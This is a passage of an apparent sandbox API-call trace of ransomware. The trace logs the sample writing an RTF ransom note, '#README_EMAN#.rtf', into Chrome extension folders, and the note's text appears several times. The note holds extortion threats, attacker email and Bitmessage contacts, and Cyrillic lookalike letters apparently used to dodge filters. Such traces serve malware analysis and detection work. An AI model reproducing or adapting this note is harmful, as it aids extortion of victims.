bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.103] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.106] CloseHandle (hObject=0x2e8) returned 1 [0292.106] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0292.106] GetLastError () returned 0x2 [0292.106] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 